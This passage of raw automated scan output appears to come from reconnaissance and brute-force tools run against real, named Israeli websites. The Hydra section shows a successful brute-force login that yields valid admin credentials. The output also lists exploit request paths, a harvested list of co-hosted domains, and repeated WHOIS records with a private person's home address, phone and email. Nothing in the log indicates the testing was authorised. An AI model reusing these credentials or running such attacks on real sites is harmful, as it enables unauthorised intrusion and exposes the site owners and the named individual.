  3687. + Start Time: 2017-12-31 07:35:44 (GMT-5)
  3688. ---------------------------------------------------------------------------
  3689. + Server: cloudflare
  3690. + Cookie __cfduid created without the secure flag
  3691. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3692. + Uncommon header 'cf-ray' found, with contents: 3d5d47cf2eb2472e-EWR
  3693. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  3694. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3695. + All CGI directories 'found', use '-C none' to test none
  3696. + Hostname 'flybox.co.il' does not match certificate's names: sni165065.cloudflaressl.com
  3697. + Scan terminated: 20 error(s) and 6 item(s) reported on remote host
  3698. + End Time: 2017-12-31 07:44:35 (GMT-5) (531 seconds)
  3699. ---------------------------------------------------------------------------
  3700. + 1 host(s) tested
  3701.  
  3702. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:44 EST
  3703. Nmap scan report for flybox.co.il (104.31.74.239)
  3704. Host is up (0.15s latency).
  3705. Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239
  3706.  
  3707. PORT STATE SERVICE VERSION
  3708. 8443/tcp filtered https-alt
  3709. Too many fingerprints match this host to give specific OS details
  3710. Network Distance: 9 hops
  3711.  
  3712. TRACEROUTE (using proto 1/icmp)
  3713. HOP RTT ADDRESS
  3714. 1 45.65 ms 10.13.0.1
  3715. 2 45.70 ms 37.187.24.253
  3716. 3 45.66 ms 10.50.225.60
  3717. 4 45.71 ms 10.17.129.40
  3718. 5 45.62 ms 10.73.0.50
  3719. 6 45.72 ms 10.95.33.10
  3720. 7 59.64 ms be100-1110.th2-1-a9.fr.eu (213.186.32.215)
  3721. 8 59.62 ms cloudflare.par.franceix.net (37.49.237.49)
  3722. 9 59.57 ms 104.31.74.239
  3723.  
  3724. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3725. Nmap done: 1 IP address (1 host up) scanned in 18.83 seconds
  3726.  + -- --=[Port 8888 closed... skipping.
  3727.  + -- --=[Port 10000 closed... skipping.
  3728.  + -- --=[Port 16992 closed... skipping.
  3729.  + -- --=[Port 27017 closed... skipping.
  3730.  + -- --=[Port 27018 closed... skipping.
  3731.  + -- --=[Port 27019 closed... skipping.
  3732.  + -- --=[Port 28017 closed... skipping.
  3733.  + -- --=[Port 49152 closed... skipping.
  3734.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
  3735.  + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
  3736.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
  3737.  __________ __ ____ ___
  3738.  \______ \_______ __ ___/ |_ ____ \ \/ /
  3739.  | | _/\_ __ \ | \ __\/ __ \ \ / 
  3740.  | | \ | | \/ | /| | \ ___/ / \ 
  3741.  |______ / |__| |____/ |__| \___ >___/\ \ 
  3742.  \/ \/ \_/
  3743.  
  3744.  + -- --=[BruteX v1.7 by 1N3
  3745.  + -- --=[http://crowdshield.com
  3746.  
  3747.  
  3748. ################################### Running Port Scan ##############################
  3749.  
  3750. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 07:44 EST
  3751. Nmap scan report for flybox.co.il (104.31.74.239)
  3752. Host is up (0.64s latency).
  3753. Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239
  3754. Not shown: 23 filtered ports
  3755. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  3756. PORT STATE SERVICE
  3757. 80/tcp open http
  3758. 443/tcp open https
  3759. 8080/tcp open http-proxy
  3760.  
  3761. Nmap done: 1 IP address (1 host up) scanned in 14.17 seconds
  3762.  
  3763. ################################### Running Brute Force ############################
  3764.  
  3765.  + -- --=[Port 21 closed... skipping.
  3766.  + -- --=[Port 22 closed... skipping.
  3767.  + -- --=[Port 23 closed... skipping.
  3768.  + -- --=[Port 25 closed... skipping.
  3769.  + -- --=[Port 80 opened... running tests...
  3770. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3771.  
  3772. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:09
  3773. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3774. [DATA] attacking http-get://flybox.co.il:80//
  3775. [80][http-get] host: flybox.co.il login: admin password: admin
  3776. [STATUS] attack finished for flybox.co.il (valid pair found)
  3777. 1 of 1 target successfully completed, 1 valid password found
  3778. Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-31 07:45:13
  3779.  + -- --=[Port 110 closed... skipping.
  3780.  + -- --=[Port 139 closed... skipping.
  3781.  + -- --=[Port 162 closed... skipping.
  3782.  + -- --=[Port 389 closed... skipping.
  3783.  + -- --=[Port 443 opened... running tests...
  3784. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3785.  
  3786. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:13
  3787. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  3788. [DATA] attacking http-gets://flybox.co.il:443//
  3789. [443][http-get] host: flybox.co.il login: admin password: admin
  3790. [STATUS] attack finished for flybox.co.il (valid pair found)
  3791. 1 of 1 target successfully completed, 1 valid password found
  3792. Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-31 07:45:18
  3793.  + -- --=[Port 445 closed... skipping.
  3794.  + -- --=[Port 512 closed... skipping.
  3795.  + -- --=[Port 513 closed... skipping.
  3796.  + -- --=[Port 514 closed... skipping.
  3797.  + -- --=[Port 993 closed... skipping.
  3798.  + -- --=[Port 1433 closed... skipping.
  3799.  + -- --=[Port 1521 closed... skipping.
  3800.  + -- --=[Port 3306 closed... skipping.
  3801.  + -- --=[Port 3389 closed... skipping.
  3802.  + -- --=[Port 5432 closed... skipping.
  3803.  + -- --=[Port 5900 closed... skipping.
  3804.  + -- --=[Port 5901 closed... skipping.
  3805.  + -- --=[Port 8000 closed... skipping.
  3806.  + -- --=[Port 8080 opened... running tests...
  3807. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3808.  
  3809. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-31 07:45:18
  3810.  + -- --=[Port 8100 closed... skipping.
  3811.  + -- --=[Port 6667 closed... skipping.
  3812. #######################################################################################################################################
  3813. Hostname www.doctorarik.co.il ISP Bezeq International (AS8551)
  3814. Continent Asia Flag
  3815. IL
  3816. Country Israel Country Code IL (ISR)
  3817. Region Unknown Local time 31 Dec 2017 06:09 IST
  3818. City Unknown Latitude 31.5
  3819. IP Address 62.219.91.10 Longitude 34.75
  3820. #######################################################################################################################################
  3821. [i] Scanning Site: http://doctorarik.co.il
  3822.  
  3823.  
  3824.  
  3825. B A S I C I N F O
  3826. ====================
  3827.  
  3828.  
  3829. [+] Site Title: הרזיה, הרזיה בריאה, הרזיה נכונה- מרפאת הרזיה של ד"ר אריק ויסבורד
  3830. [+] IP address: 62.219.91.10
  3831. [+] Web Server: Microsoft-IIS/7.5
  3832. [+] CMS: WordPress
  3833. [+] Cloudflare: Not Detected
  3834. [+] Robots File: Could NOT Find robots.txt!
  3835.  
  3836.  
  3837.  
  3838.  
  3839. W H O I S L O O K U P
  3840. ========================
  3841.  
  3842.  
  3843. % The data in the WHOIS database of the .il registry is provided
  3844. % by ISOC-IL for information purposes, and to assist persons in
  3845. % obtaining information about or related to a domain name
  3846. % registration record. ISOC-IL does not guarantee its accuracy.
  3847. % By submitting a WHOIS query, you agree that you will use this
  3848. % Data only for lawful purposes and that, under no circumstances
  3849. % will you use this Data to: (1) allow, enable, or otherwise
  3850. % support the transmission of mass unsolicited, commercial
  3851. % advertising or solicitations via e-mail (spam);
  3852. % or (2) enable high volume, automated, electronic processes that
  3853. % apply to ISOC-IL (or its systems).
  3854. % ISOC-IL reserves the right to modify these terms at any time.
  3855. % By submitting this query, you agree to abide by this policy.
  3856.  
  3857. query: doctorarik.co.il
  3858.  
  3859. reg-name: doctorarik
  3860. domain: doctorarik.co.il
  3861.  
  3862. descr: Arik Weisbord
  3863. descr: A.D. Gordon 14
  3864. descr: Herzelya
  3865. descr: 4643301
  3866. descr: Israel
  3867. phone: +972 54 4277997
  3868. fax-no: +972 9 9552093
  3869. e-mail: drarik AT netvision.net.il
  3870. admin-c: DT-AW7749-IL
  3871. tech-c: DT-AW7749-IL
  3872. zone-c: DT-AW7749-IL
  3873. nserver: ns1.dtnt.info
  3874. nserver: ns2.dtnt.info
  3875. validity: 03-04-2018
  3876. DNSSEC: unsigned
  3877. status: Transfer Locked
  3878. changed: domain-registrar AT isoc.org.il 20160403 (Assigned)
  3879.  
  3880. person: Arik Weisbord
  3881. address: Arik Weisbord
  3882. address: A.D. Gordon 14
  3883. address: Herzelya
  3884. address: 4643301
  3885. address: Israel
  3886. phone: +972 54 4277997
  3887. fax-no: +972 9 9552093
  3888. e-mail: drarik AT netvision.net.il
  3889. nic-hdl: DT-AW7749-IL
  3890. changed: domain-registrar AT isoc.org.il 20160403
  3891.  
  3892. registrar name: Domain The Net Technologies Ltd
  3893. registrar info: http://www.domainthenet.com
  3894.  
  3895. % Rights to the data above are restricted by copyright.
  3896.  
  3897.  
  3898.  
  3899.  
  3900. G E O I P L O O K U P
  3901. =========================
  3902.  
  3903. [i] IP Address: 62.219.91.10
  3904. [i] Country: IL
  3905. [i] State: N/A
  3906. [i] City: N/A
  3907. [i] Latitude: 31.500000
  3908. [i] Longitude: 34.750000
  3909.  
  3910.  
  3911.  
  3912.  
  3913. H T T P H E A D E R S
  3914. =======================
  3915.  
  3916.  
  3917. [i] HTTP/1.1 301 Moved Permanently
  3918. [i] Content-Type: text/html; charset=UTF-8
  3919. [i] Location: http://www.doctorarik.co.il/
  3920. [i] Server: Microsoft-IIS/7.5
  3921. [i] X-Powered-By: ASP.NET
  3922. [i] X-Powered-By-Plesk: PleskWin
  3923. [i] Date: Sun, 31 Dec 2017 04:17:21 GMT
  3924. [i] Connection: close
  3925. [i] Content-Length: 151
  3926. [i] HTTP/1.1 200 OK
  3927. [i] Content-Type: text/html; charset=UTF-8
  3928. [i] Server: Microsoft-IIS/7.5
  3929. [i] X-Pingback: http://www.doctorarik.co.il/xmlrpc.php
  3930. [i] Set-Cookie: PHPSESSID=009994e511dd64fd22a381fed060f747; path=/
  3931. [i] X-Powered-By: ASP.NET
  3932. [i] X-Powered-By-Plesk: PleskWin
  3933. [i] Date: Sun, 31 Dec 2017 04:17:22 GMT
  3934. [i] Connection: close
  3935. [i] Content-Length: 19894
  3936.  
  3937.  
  3938.  
  3939.  
  3940. D N S L O O K U P
  3941. ===================
  3942.  
  3943. doctorarik.co.il. 10799 IN A 62.219.91.10
  3944. doctorarik.co.il. 10799 IN MX 10 mail.doctorarik.co.il.
  3945. doctorarik.co.il. 10799 IN MX 50 mail.dtnt.info.
  3946. doctorarik.co.il. 10799 IN SOA ns1.dtnt.info.doctorarik.co.il. support.dtnt.com.doctorarik.co.il. 2015040700 5400 3600 2419199 3600
  3947. doctorarik.co.il. 21599 IN NS ns1.dtnt.info.
  3948. doctorarik.co.il. 21599 IN NS ns3.dtnt.info.
  3949. doctorarik.co.il. 21599 IN NS ns2.dtnt.info.
  3950.  
  3951.  
  3952.  
  3953.  
  3954. S U B N E T C A L C U L A T I O N
  3955. ====================================
  3956.  
  3957. Address = 62.219.91.10
  3958. Network = 62.219.91.10 / 32
  3959. Netmask = 255.255.255.255
  3960. Broadcast = not needed on Point-to-Point links
  3961. Wildcard Mask = 0.0.0.0
  3962. Hosts Bits = 0
  3963. Max. Hosts = 1 (2^0 - 0)
  3964. Host Range = { 62.219.91.10 - 62.219.91.10 }
  3965.  
  3966.  
  3967.  
  3968. N M A P P O R T S C A N
  3969. ============================
  3970.  
  3971.  
  3972. Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 04:17 UTC
  3973. Nmap scan report for doctorarik.co.il (62.219.91.10)
  3974. Host is up (0.14s latency).
  3975. rDNS record for 62.219.91.10: cust-62-219-91-10.cust.bezeqint.net
  3976. PORT STATE SERVICE VERSION
  3977. 21/tcp open ftp Microsoft ftpd
  3978. 22/tcp filtered ssh
  3979. 23/tcp filtered telnet
  3980. 25/tcp filtered smtp
  3981. 80/tcp open http Microsoft IIS httpd 7.5
  3982. 110/tcp filtered pop3
  3983. 143/tcp filtered imap
  3984. 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  3985. 445/tcp filtered microsoft-ds
  3986. 3389/tcp filtered ms-wbt-server
  3987. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  3988.  
  3989. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3990. Nmap done: 1 IP address (1 host up) scanned in 15.81 seconds
  3991.  
  3992.  
  3993.  
  3994. S U B - D O M A I N F I N D E R
  3995. ==================================
  3996.  
  3997.  
  3998. [i] Total Subdomains Found : 1
  3999.  
  4000. [+] Subdomain: mail.doctorarik.co.il
  4001. [-] IP: 62.219.91.130
  4002. [!] IP Address : 62.219.91.10
  4003. [!] Server: Microsoft-IIS/7.5
  4004. [!] Powered By: ASP.NET
  4005. [-] Clickjacking protection is not in place.
  4006. [+] Operating System : Windows
  4007. [!] www.doctorarik.co.il doesn't seem to use a CMS
  4008. [+] Honeypot Probabilty: 0%
  4009. ----------------------------------------
  4010. [+] Robots.txt retrieved
  4011. User-agent: *
  4012. Disallow:
  4013.  
  4014. ----------------------------------------
  4015. PORT STATE SERVICE VERSION
  4016. 21/tcp open ftp Microsoft ftpd
  4017. 22/tcp filtered ssh
  4018. 23/tcp filtered telnet
  4019. 25/tcp filtered smtp
  4020. 80/tcp open http Microsoft IIS httpd 7.5
  4021. 110/tcp filtered pop3
  4022. 143/tcp filtered imap
  4023. 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  4024. 445/tcp filtered microsoft-ds
  4025. 3389/tcp filtered ms-wbt-server
  4026. ----------------------------------------
  4027.  
  4028. [+] DNS Records
  4029. ns2.dtnt.info. (62.219.91.150) AS8551 Bezeq International Israel
  4030. ns1.dtnt.info. (62.219.91.139) AS8551 Bezeq International Israel
  4031. ns3.dtnt.info. (52.36.225.219) AS16509 Amazon.com, Inc. United States
  4032.  
  4033. [+] MX Records
  4034. 50 (62.219.91.130) AS8551 Bezeq International Israel
  4035.  
  4036. [+] MX Records
  4037. 10 (62.219.91.130) AS8551 Bezeq International Israel
  4038.  
  4039. [+] Host Records (A)
  4040. www.doctorarik.co.ilHTTP: (cust-62-219-91-10.cust.bezeqint.net) (62.219.91.10) AS8551 Bezeq International Israel
  4041.  
  4042. [+] TXT Records
  4043.  
  4044. [+] DNS Map: https://dnsdumpster.com/static/map/www.doctorarik.co.il.png
  4045.  
  4046. [>] Initiating 3 intel modules
  4047. [>] Loading Alpha module (1/3)
  4048. [>] Beta module deployed (2/3)
  4049. [>] Gamma module initiated (3/3)
  4050. No emails found
  4051. No hosts found
  4052. [+] Virtual hosts:
  4053. -----------------
  4054. [>] Crawling the target for fuzzable URLs
  4055. Vulnerability Entries: 611
  4056. Last update: February 2, 2012
  4057.  
  4058. Use "update" option to update the database
  4059. Use "check" option to check the scanner update
  4060. Use "download" option to download the scanner latest version package
  4061. Use svn co to update the scanner and the database
  4062. svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan
  4063.  
  4064.  
  4065. Target: http://doctorarik.co.il
  4066.  
  4067. Server: Microsoft-IIS/7.5
  4068. X-Powered-By: ASP.NET
  4069.  
  4070.  
  4071. ## Checking if the target has deployed an Anti-Scanner measure
  4072.  
  4073. [!] Scanning Passed ..... OK
  4074.  
  4075.  
  4076. ## Detecting Joomla! based Firewall ...
  4077.  
  4078. [!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
  4079. [!] The vulnerability probing may be logged and protected.
  4080.  
  4081. [!] A Joomla! J-Firewall (com_jfw) is detected.
  4082. [!] The vulnerability probing may be logged and protected.
  4083.  
  4084. [!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
  4085. [!] The vulnerability probing may be logged and protected.
  4086.  
  4087. [!] A SecureLive Joomla! firewall is detected.
  4088. [!] The vulnerability probing may be logged and protected.
  4089.  
  4090. [!] FWScript(from firewallscript.com) is likely to be used.
  4091. [!] The vulnerability probing may be logged and protected.
  4092.  
  4093. [!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
  4094. [!] It is likely that webmaster routinely checks insecurities.
  4095.  
  4096. [!] A security scanner (com_securityscanner/com_securityscan) is detected.
  4097.  
  4098. [!] A Joomla! jSecure Authentication is detected.
  4099. [!] You need additional secret key to access /administrator directory
  4100. [!] Default is jSecure like /administrator/?jSecure ;)
  4101.  
  4102. [!] A Joomla! GuardXT Security Component is detected.
  4103. [!] It is likely that webmaster routinely checks for insecurities.
  4104.  
  4105. [!] A Joomla! JoomSuite Defender is detected.
  4106. [!] The vulnerability probing may be logged and protected.
  4107.  
  4108.  
  4109. ## Fingerprinting in progress ...
  4110.  
  4111. ~Unable to detect the version. Is it sure a Joomla?
  4112.  
  4113. ## Fingerprinting done.
  4114.  
  4115.  
  4116.  
  4117.  
  4118. Vulnerabilities Discovered
  4119. ==========================
  4120.  
  4121. # 1
  4122. Info -> Generic: htaccess.txt has not been renamed.
  4123. Versions Affected: Any
  4124. Check: /htaccess.txt
  4125. Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
  4126. Vulnerable? Yes
  4127.  
  4128.  
  4129. # 379
  4130. Info -> Component: com_rss DOS Vulnerability
  4131. Versions effected: Joomla! <= 1.0.7
  4132. Check: /components/com_rss/
  4133. Exploit: /index2.php?option=com_rss&feed=test
  4134. Vulnerable? Yes
  4135. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  4136. Server: 192.168.1.254
  4137. Address: 192.168.1.254#53
  4138.  
  4139. Non-authoritative answer:
  4140. Name: doctorarik.co.il
  4141. Address: 62.219.91.10
  4142.  
  4143. doctorarik.co.il has address 62.219.91.10
  4144. doctorarik.co.il mail is handled by 10 mail.doctorarik.co.il.
  4145. doctorarik.co.il mail is handled by 50 mail.dtnt.info.
  4146.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  4147.  
  4148. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  4149.  
  4150. [+] Target is doctorarik.co.il
  4151. [+] Loading modules.
  4152. [+] Following modules are loaded:
  4153. [x] [1] ping:icmp_ping - ICMP echo discovery module
  4154. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  4155. [x] [3] ping:udp_ping - UDP-based ping discovery module
  4156. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  4157. [x] [5] infogather:portscan - TCP and UDP PortScanner
  4158. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  4159. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  4160. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  4161. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  4162. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  4163. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  4164. [x] [12] fingerprint:smb - SMB fingerprinting module
  4165. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  4166. [+] 13 modules registered
  4167. [+] Initializing scan engine
  4168. [+] Running scan engine
  4169. [-] ping:tcp_ping module: no closed/open TCP ports known on 62.219.91.10. Module test failed
  4170. [-] ping:udp_ping module: no closed/open UDP ports known on 62.219.91.10. Module test failed
  4171. [-] No distance calculation. 62.219.91.10 appears to be dead or no ports known
  4172. [+] Host: 62.219.91.10 is down (Guess probability: 0%)
  4173. [+] Cleaning up scan engine
  4174. [+] Modules deinitialized
  4175. [+] Execution completed.
  4176.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  4177.  
  4178. % The data in the WHOIS database of the .il registry is provided
  4179. % by ISOC-IL for information purposes, and to assist persons in
  4180. % obtaining information about or related to a domain name
  4181. % registration record. ISOC-IL does not guarantee its accuracy.
  4182. % By submitting a WHOIS query, you agree that you will use this
  4183. % Data only for lawful purposes and that, under no circumstances
  4184. % will you use this Data to: (1) allow, enable, or otherwise
  4185. % support the transmission of mass unsolicited, commercial
  4186. % advertising or solicitations via e-mail (spam);
  4187. % or (2) enable high volume, automated, electronic processes that
  4188. % apply to ISOC-IL (or its systems).
  4189. % ISOC-IL reserves the right to modify these terms at any time.
  4190. % By submitting this query, you agree to abide by this policy.
  4191.  
  4192. query: doctorarik.co.il
  4193.  
  4194. reg-name: doctorarik
  4195. domain: doctorarik.co.il
  4196.  
  4197. descr: Arik Weisbord
  4198. descr: A.D. Gordon 14
  4199. descr: Herzelya
  4200. descr: 4643301
  4201. descr: Israel
  4202. phone: +972 54 4277997
  4203. fax-no: +972 9 9552093
  4204. e-mail: drarik AT netvision.net.il
  4205. admin-c: DT-AW7749-IL
  4206. tech-c: DT-AW7749-IL
  4207. zone-c: DT-AW7749-IL
  4208. nserver: ns1.dtnt.info
  4209. nserver: ns2.dtnt.info
  4210. validity: 03-04-2018
  4211. DNSSEC: unsigned
  4212. status: Transfer Locked
  4213. changed: domain-registrar AT isoc.org.il 20160403 (Assigned)
  4214.  
  4215. person: Arik Weisbord
  4216. address: Arik Weisbord
  4217. address: A.D. Gordon 14
  4218. address: Herzelya
  4219. address: 4643301
  4220. address: Israel
  4221. phone: +972 54 4277997
  4222. fax-no: +972 9 9552093
  4223. e-mail: drarik AT netvision.net.il
  4224. nic-hdl: DT-AW7749-IL
  4225. changed: domain-registrar AT isoc.org.il 20160403
  4226.  
  4227. registrar name: Domain The Net Technologies Ltd
  4228. registrar info: http://www.domainthenet.com
  4229.  
  4230. % Rights to the data above are restricted by copyright.
  4231.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  4232.  
  4233. *******************************************************************
  4234. * *
  4235. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  4236. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  4237. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  4238. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  4239. * *
  4240. * TheHarvester Ver. 2.7 *
  4241. * Coded by Christian Martorella *
  4242. * Edge-Security Research *
  4243. * cmartorella@edge-security.com *
  4244. *******************************************************************
  4245.  
  4246.  
  4247. Full harvest..
  4248. [-] Searching in Google..
  4249. Searching 0 results...
  4250. Searching 100 results...
  4251. Searching 200 results...
  4252. [-] Searching in PGP Key server..
  4253. [-] Searching in Bing..
  4254. Searching 50 results...
  4255. Searching 100 results...
  4256. Searching 150 results...
  4257. Searching 200 results...
  4258. [-] Searching in Exalead..
  4259. Searching 50 results...
  4260. Searching 100 results...
  4261. Searching 150 results...
  4262. Searching 200 results...
  4263. Searching 250 results...
  4264.  
  4265.  
  4266. [+] Emails found:
  4267. ------------------
  4268. No emails found
  4269.  
  4270. [+] Hosts found in search engines:
  4271. ------------------------------------
  4272. [-] Resolving hostnames IPs...
  4273. 62.219.91.10:www.doctorarik.co.il
  4274. [+] Virtual hosts:
  4275. ==================
  4276. 62.219.91.10 www.metrology.co.il
  4277. 62.219.91.10 www.bonbi.co.il
  4278. 62.219.91.10 zantkeren.co.il
  4279. 62.219.91.10 www.askal.co.il
  4280. 62.219.91.10 www.joles.co.il
  4281. 62.219.91.10 www.zuk-m.co.il
  4282. 62.219.91.10 www.hotel-dead-sea.com
  4283. 62.219.91.10 fr.informationvine.com
  4284. 62.219.91.10 www.shabat-chatan.co.il
  4285. 62.219.91.10 www.lahav-y.co.il
  4286. 62.219.91.10 www.servadio
  4287. 62.219.91.10 tami-4.com
  4288. 62.219.91.10 www.chortkow.org.il
  4289. 62.219.91.10 zahi.co.il
  4290. 62.219.91.10 www.hotel-funday.co.il
  4291. 62.219.91.10 www.m-bol.co.il
  4292. 62.219.91.10 synergy-it.co.il
  4293. 62.219.91.10 kdc.co.il
  4294. 62.219.91.10 batyarotem.co.il
  4295. 62.219.91.10 www.tbh.co.il
  4296. 62.219.91.10 www.tarsis-agrichem.co.il
  4297. 62.219.91.10 www.israel-tours-operator.com
  4298. 62.219.91.10 www.rdpeled
  4299. 62.219.91.10 4x4bike.co.il
  4300. 62.219.91.10 masad.co.il
  4301. 62.219.91.10 www.bedouintent.co.il
  4302. 62.219.91.10 fac.co.il
  4303. 62.219.91.10 zbcigar.co.il
  4304. 62.219.91.10 www.romantic-funday.co.il
  4305. 62.219.91.10 www.doctorarik.co.il
  4306. 62.219.91.10 www.batei-malon-eilat.co.il
  4307. 62.219.91.10 servadio.co.il
  4308. 62.219.91.10 www.nofesh-baaretz.co.il
  4309. 62.219.91.10 rshein-arc.co.il
  4310. 62.219.91.10 www.rshein-arc.co.il
  4311. 62.219.91.10 www.eilat-groups.co.il
  4312. 62.219.91.10 www.horses.org.il
  4313. 62.219.91.10 gibush.co.il
  4314. 62.219.91.10 www.keshet-enoshit.co.il
  4315. 62.219.91.10 www.fundays.co.il
  4316. 62.219.91.10 www.gibush.co.il
  4317. 62.219.91.10 www.conferences.co.il
  4318. 62.219.91.10 www.yemei-gibush.co.il
  4319. 62.219.91.10 www.y-huledet.co.il
  4320. 62.219.91.10 habaitshelanat.co.il
  4321. 62.219.91.10 www.deadsea-pinuk.co.il
  4322. 62.219.91.10 www.matkot1.co.il
  4323.  
  4324. ******************************************************
  4325. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
  4326. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
  4327. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
  4328. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
  4329. * |___/ *
  4330. * Metagoofil Ver 2.2 *
  4331. * Christian Martorella *
  4332. * Edge-Security.com *
  4333. * cmartorella_at_edge-security.com *
  4334. ******************************************************
  4335.  
  4336. [-] Starting online search...
  4337.  
  4338. [-] Searching for doc files, with a limit of 200
  4339. Searching 100 results...
  4340. Searching 200 results...
  4341. Results: 0 files found
  4342. Starting to download 50 of them:
  4343. ----------------------------------------
  4344.  
  4345.  
  4346. [-] Searching for pdf files, with a limit of 200
  4347. Searching 100 results...
  4348. Searching 200 results...
  4349. Results: 0 files found
  4350. Starting to download 50 of them:
  4351. ----------------------------------------
  4352.  
  4353.  
  4354. [-] Searching for xls files, with a limit of 200
  4355. Searching 100 results...
  4356. Searching 200 results...
  4357. Results: 0 files found
  4358. Starting to download 50 of them:
  4359. ----------------------------------------
  4360.  
  4361.  
  4362. [-] Searching for csv files, with a limit of 200
  4363. Searching 100 results...
  4364. Searching 200 results...
  4365. Results: 0 files found
  4366. Starting to download 50 of them:
  4367. ----------------------------------------
  4368.  
  4369.  
  4370. [-] Searching for txt files, with a limit of 200
  4371. Searching 100 results...
  4372. Searching 200 results...
  4373. Results: 0 files found
  4374. Starting to download 50 of them:
  4375. ----------------------------------------
  4376.  
  4377. processing
  4378. user
  4379. email
  4380.  
  4381. [+] List of users found:
  4382. --------------------------
  4383.  
  4384. [+] List of software found:
  4385. -----------------------------
  4386.  
  4387. [+] List of paths and servers found:
  4388. ---------------------------------------
  4389.  
  4390. [+] List of e-mails found:
  4391. ----------------------------
  4392.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  4393.  
  4394. ; <<>> DiG 9.11.2-5-Debian <<>> -x doctorarik.co.il
  4395. ;; global options: +cmd
  4396. ;; Got answer:
  4397. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1707
  4398. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  4399.  
  4400. ;; OPT PSEUDOSECTION:
  4401. ; EDNS: version: 0, flags:; udp: 4096
  4402. ;; QUESTION SECTION:
  4403. ;il.co.doctorarik.in-addr.arpa. IN PTR
  4404.  
  4405. ;; AUTHORITY SECTION:
  4406. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102519 1800 900 604800 3600
  4407.  
  4408. ;; Query time: 105 msec
  4409. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  4410. ;; WHEN: Sat Dec 30 23:17:21 EST 2017
  4411. ;; MSG SIZE rcvd: 126
  4412.  
  4413. dnsenum VERSION:1.2.4
  4414. 
  4415. ----- doctorarik.co.il -----
  4416. 
  4417.  
  4418. Host's addresses:
  4419. __________________
  4420.  
  4421. doctorarik.co.il. 10686 IN A 62.219.91.10
  4422. 
  4423.  
  4424. Name Servers:
  4425. ______________
  4426.  
  4427. ns3.dtnt.info. 28800 IN A 52.36.225.219
  4428. ns2.dtnt.info. 28799 IN A 62.219.91.150
  4429. ns1.dtnt.info. 28799 IN A 62.219.91.139
  4430. 
  4431.  
  4432. Mail (MX) Servers:
  4433. ___________________
  4434.  
  4435. mail.doctorarik.co.il. 10800 IN A 62.219.91.130
  4436. mail.dtnt.info. 28800 IN A 62.219.91.130
  4437. 
  4438.  
  4439. Trying Zone Transfers and getting Bind Versions:
  4440. _________________________________________________
  4441.  
  4442. 
  4443. Trying Zone Transfer for doctorarik.co.il on ns3.dtnt.info ...
  4444.  
